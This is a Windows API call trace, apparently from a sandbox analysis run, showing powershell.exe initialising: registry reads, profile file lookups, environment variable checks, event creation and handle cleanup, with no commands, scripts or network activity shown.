	[0149.739] CoTaskMemAlloc (cb=0x5a) returned 0x1b84ff50
	[0149.739] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd7cc, lpData=0x1b84ff50, lpcbData=0x1cd7c8*=0x56 | out: lpType=0x1cd7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd7c8*=0x56) returned 0x0
	[0149.739] CoTaskMemFree (pv=0x1b84ff50) 
	[0149.739] RegCloseKey (hKey=0x3a4) returned 0x0
	[0149.739] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd878 | out: phkResult=0x1cd878*=0x3a4) returned 0x0
	[0149.740] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd7fc, lpData=0x0, lpcbData=0x1cd7f8*=0x0 | out: lpType=0x1cd7fc*=0x1, lpData=0x0, lpcbData=0x1cd7f8*=0x56) returned 0x0
	[0149.740] CoTaskMemAlloc (cb=0x5a) returned 0x1b84ff50
	[0149.740] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd7cc, lpData=0x1b84ff50, lpcbData=0x1cd7c8*=0x56 | out: lpType=0x1cd7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd7c8*=0x56) returned 0x0
	[0149.740] CoTaskMemFree (pv=0x1b84ff50) 
	[0149.740] RegCloseKey (hKey=0x3a4) returned 0x0
	[0149.744] CoTaskMemAlloc (cb=0x20c) returned 0x1b827d60
	[0149.745] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b827d60 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0149.746] CoTaskMemFree (pv=0x1b827d60) 
	[0149.746] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0149.747] CoTaskMemAlloc (cb=0x20c) returned 0x1b827d60
	[0149.747] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b827d60 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0149.747] CoTaskMemFree (pv=0x1b827d60) 
	[0149.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0149.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0149.752] SetErrorMode (uMode=0x1) returned 0x1
	[0149.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd7e0 | out: lpFileInformation=0x1cd7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0149.752] SetErrorMode (uMode=0x1) returned 0x1
	[0149.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0149.752] SetErrorMode (uMode=0x1) returned 0x1
	[0149.753] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd7e0 | out: lpFileInformation=0x1cd7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0149.753] SetErrorMode (uMode=0x1) returned 0x1
	[0149.753] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0149.753] SetErrorMode (uMode=0x1) returned 0x1
	[0149.753] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd7e0 | out: lpFileInformation=0x1cd7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0149.753] SetErrorMode (uMode=0x1) returned 0x1
	[0149.753] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0149.753] SetErrorMode (uMode=0x1) returned 0x1
	[0149.753] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd7e0 | out: lpFileInformation=0x1cd7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0149.753] SetErrorMode (uMode=0x1) returned 0x1
	[0149.757] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.757] CoTaskMemFree (pv=0x23f350) 
	[0149.758] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.758] CoTaskMemFree (pv=0x23f350) 
	[0149.864] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.864] CoTaskMemFree (pv=0x23f350) 
	[0149.867] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.868] CoTaskMemFree (pv=0x23f350) 
	[0149.874] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.874] CoTaskMemFree (pv=0x23f350) 
	[0149.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c8
	[0149.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a8
	[0149.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
	[0149.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0
	[0149.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b4
	[0149.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x31c
	[0149.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0149.877] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8
	[0149.877] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340
	[0149.877] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x318
	[0149.877] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0149.877] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0149.880] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.880] CoTaskMemFree (pv=0x23f350) 
	[0149.883] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0149.883] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1cd9c0 | out: lpMode=0x1cd9c0) returned 1
	[0149.884] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.884] CoTaskMemFree (pv=0x23f350) 
	[0149.888] SetEvent (hEvent=0x3b0) returned 1
	[0149.888] SetEvent (hEvent=0x3c8) returned 1
	[0149.888] SetEvent (hEvent=0x3a8) returned 1
	[0149.888] SetEvent (hEvent=0x38c) returned 1
	[0149.888] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0149.891] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.891] CoTaskMemFree (pv=0x23f350) 
	[0149.892] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd718 | out: phkResult=0x1cd718*=0x354) returned 0x0
	[0149.892] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cd69c, lpData=0x0, lpcbData=0x1cd698*=0x0 | out: lpType=0x1cd69c*=0x0, lpData=0x0, lpcbData=0x1cd698*=0x0) returned 0x2

Thread:
	id = 150
	os_tid = 0xb14


Thread:
	id = 151
	os_tid = 0xa74


Thread:
	id = 156
	os_tid = 0x5b4


Thread:
	id = 159
	os_tid = 0x7d8


Thread:
	id = 161
	os_tid = 0x4dc

	[0127.644] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0140.822] RegCloseKey (hKey=0x318) returned 0x0
	[0140.823] LocalFree (hMem=0x2482e0) returned 0x0
	[0140.823] RegCloseKey (hKey=0x340) returned 0x0
	[0140.823] LocalFree (hMem=0x248310) returned 0x0
	[0140.823] CloseHandle (hObject=0x338) returned 1
	[0140.823] CloseHandle (hObject=0x13) returned 1
	[0140.824] CloseHandle (hObject=0xf) returned 1
	[0140.824] RegCloseKey (hKey=0x320) returned 0x0
	[0140.825] RegCloseKey (hKey=0x31c) returned 0x0
	[0143.324] RegCloseKey (hKey=0x31c) returned 0x0
	[0146.121] RegCloseKey (hKey=0x39c) returned 0x0
	[0146.121] RegCloseKey (hKey=0x398) returned 0x0
	[0146.122] RegCloseKey (hKey=0x394) returned 0x0
	[0146.122] RegCloseKey (hKey=0x390) returned 0x0
	[0146.122] RegCloseKey (hKey=0x368) returned 0x0
	[0146.123] RegCloseKey (hKey=0x3c4) returned 0x0
	[0146.123] RegCloseKey (hKey=0x3c0) returned 0x0
	[0146.123] RegCloseKey (hKey=0x388) returned 0x0
	[0146.123] RegCloseKey (hKey=0x384) returned 0x0
	[0146.123] RegCloseKey (hKey=0x380) returned 0x0
	[0146.124] RegCloseKey (hKey=0x37c) returned 0x0
	[0146.124] RegCloseKey (hKey=0x378) returned 0x0
	[0146.124] RegCloseKey (hKey=0x374) returned 0x0
	[0146.124] RegCloseKey (hKey=0x370) returned 0x0
	[0146.125] RegCloseKey (hKey=0x36c) returned 0x0
	[0146.125] RegCloseKey (hKey=0x3bc) returned 0x0
	[0146.125] RegCloseKey (hKey=0x35c) returned 0x0
	[0146.125] RegCloseKey (hKey=0x358) returned 0x0
	[0146.126] RegCloseKey (hKey=0x354) returned 0x0
	[0146.126] RegCloseKey (hKey=0x350) returned 0x0
	[0146.126] RegCloseKey (hKey=0x34c) returned 0x0
	[0146.126] RegCloseKey (hKey=0x348) returned 0x0
	[0146.127] RegCloseKey (hKey=0x318) returned 0x0
	[0146.127] RegCloseKey (hKey=0x340) returned 0x0
	[0146.127] RegCloseKey (hKey=0x3b8) returned 0x0
	[0146.127] RegCloseKey (hKey=0x320) returned 0x0
	[0146.127] RegCloseKey (hKey=0x31c) returned 0x0
	[0146.128] RegCloseKey (hKey=0x3b4) returned 0x0
	[0146.128] RegCloseKey (hKey=0x3b0) returned 0x0
	[0146.128] RegCloseKey (hKey=0x38c) returned 0x0
	[0146.128] RegCloseKey (hKey=0x3c8) returned 0x0
	[0146.129] RegCloseKey (hKey=0x3a8) returned 0x0
	[0146.129] RegCloseKey (hKey=0x3a4) returned 0x0
	[0146.129] RegCloseKey (hKey=0x3a0) returned 0x0
	[0153.189] RegCloseKey (hKey=0x354) returned 0x0
	[0155.555] CloseHandle (hObject=0x3d0) returned 1
	[0155.555] CloseHandle (hObject=0x3ac) returned 1
	[0155.556] CloseHandle (hObject=0x3c0) returned 1
	[0155.556] CloseHandle (hObject=0x388) returned 1
	[0155.557] CloseHandle (hObject=0x384) returned 1
	[0155.557] CloseHandle (hObject=0x380) returned 1
	[0155.558] CloseHandle (hObject=0x378) returned 1
	[0155.558] CloseHandle (hObject=0x354) returned 1
	[0155.558] CloseHandle (hObject=0x37c) returned 1
	[0155.714] CloseHandle (hObject=0x374) returned 1
	[0181.823] CoGetContextToken (in: pToken=0x1b50f490 | out: pToken=0x1b50f490) returned 0x0
	[0181.823] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0181.823] WbemLocator:IUnknown:Release (This=0x1cc316b0) returned 0x0
	[0181.823] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0181.823] IUnknown:Release (This=0x1cc34830) returned 0x1
	[0181.824] CoGetContextToken (in: pToken=0x1b50f2c0 | out: pToken=0x1b50f2c0) returned 0x0
	[0181.824] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x1
	[0181.824] IUnknown:Release (This=0x1cc345f8) returned 0x0
	[0181.962] CloseHandle (hObject=0x4ac) returned 1
	[0181.963] CloseHandle (hObject=0x4a8) returned 1
	[0215.764] CoGetContextToken (in: pToken=0x1b50f490 | out: pToken=0x1b50f490) returned 0x0
	[0215.765] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0215.765] WbemLocator:IUnknown:Release (This=0x1cc318a0) returned 0x0
	[0215.765] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0215.765] IUnknown:Release (This=0x1cc38410) returned 0x1
	[0215.765] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0215.765] WbemLocator:IUnknown:Release (This=0x1cc31a40) returned 0x0
	[0215.765] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0215.765] IUnknown:Release (This=0x1cc3c960) returned 0x1
	[0215.765] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0215.765] WbemLocator:IUnknown:Release (This=0x1cc31c00) returned 0x0
	[0215.766] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0215.766] IUnknown:Release (This=0x1cc3de20) returned 0x1
	[0215.766] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0215.766] WbemLocator:IUnknown:Release (This=0x1cc31dc0) returned 0x0
	[0215.766] CoGetContextToken (in: pToken=0x1b50f3b0 | out: pToken=0x1b50f3b0) returned 0x0
	[0215.766] IUnknown:Release (This=0x1cc40950) returned 0x1
	[0215.766] CoGetContextToken (in: pToken=0x1b50f2c0 | out: pToken=0x1b50f2c0) returned 0x0
	[0215.767] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x1
	[0215.767] IUnknown:Release (This=0x1cc36188) returned 0x0
	[0216.427] CoGetContextToken (in: pToken=0x1b50f2c0 | out: pToken=0x1b50f2c0) returned 0x0
	[0216.427] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x1
	[0216.428] IUnknown:Release (This=0x1cc40798) returned 0x0
	[0216.429] CoGetContextToken (in: pToken=0x1b50f2c0 | out: pToken=0x1b50f2c0) returned 0x0
	[0216.429] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x1
	[0216.429] IUnknown:Release (This=0x1cc381d8) returned 0x0
	[0216.431] CoGetContextToken (in: pToken=0x1b50f2c0 | out: pToken=0x1b50f2c0) returned 0x0
	[0216.431] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x1
	[0216.431] IUnknown:Release (This=0x1cc3c728) returned 0x0
	[0216.433] CloseHandle (hObject=0x4a8) returned 1
	[0216.433] CloseHandle (hObject=0x4ac) returned 1

Thread:
	id = 166
	os_tid = 0x3c4

	[0150.080] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0150.084] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0150.089] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.089] CoTaskMemFree (pv=0x23f350) 
	[0150.091] VirtualQuery (in: lpAddress=0x1c68d920, lpBuffer=0x1c68e7e0, dwLength=0x30 | out: lpBuffer=0x1c68e7e0*(BaseAddress=0x1c68d000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0150.105] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.105] CoTaskMemFree (pv=0x23f350) 
	[0150.108] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.108] CoTaskMemFree (pv=0x23f350) 
	[0150.112] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.112] CoTaskMemFree (pv=0x23f350) 
	[0150.176] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.177] CoTaskMemFree (pv=0x23f350) 
	[0150.179] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.179] CoTaskMemFree (pv=0x23f350) 
	[0150.180] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.180] CoTaskMemFree (pv=0x23f350) 
	[0150.185] VirtualQuery (in: lpAddress=0x1c68dbd0, lpBuffer=0x1c68ea90, dwLength=0x30 | out: lpBuffer=0x1c68ea90*(BaseAddress=0x1c68d000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0150.186] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.186] CoTaskMemFree (pv=0x23f350) 
	[0150.188] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.188] CoTaskMemFree (pv=0x23f350) 
	[0150.189] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.189] CoTaskMemFree (pv=0x23f350) 
	[0150.190] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.190] CoTaskMemFree (pv=0x23f350) 
	[0150.194] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.194] CoTaskMemFree (pv=0x23f350) 
	[0150.300] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.301] CoTaskMemFree (pv=0x23f350) 
	[0150.303] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.303] CoTaskMemFree (pv=0x23f350) 
	[0150.305] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.305] CoTaskMemFree (pv=0x23f350) 
	[0150.355] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.355] CoTaskMemFree (pv=0x23f350) 
	[0150.356] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.356] CoTaskMemFree (pv=0x23f350) 
	[0150.357] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.358] CoTaskMemFree (pv=0x23f350) 
	[0150.359] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.360] CoTaskMemFree (pv=0x23f350) 
	[0150.380] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.380] CoTaskMemFree (pv=0x23f350) 
	[0150.597] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.598] CoTaskMemFree (pv=0x23f350) 
	[0150.601] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0150.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.601] CoTaskMemFree (pv=0x23f350) 
	[0152.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c68c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0152.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c68c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0152.149] CoTaskMemAlloc (cb=0x20c) returned 0x1b829570
	[0152.149] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b829570, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0152.149] CoTaskMemFree (pv=0x1b829570) 
	[0152.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c68c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0152.169] GetCurrentProcess () returned 0xffffffffffffffff
	[0152.169] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c668 | out: TokenHandle=0x1c68c668*=0x374) returned 1
	[0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c68c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0152.176] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c68c710 | out: lpFileInformation=0x1c68c710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0152.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c68c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
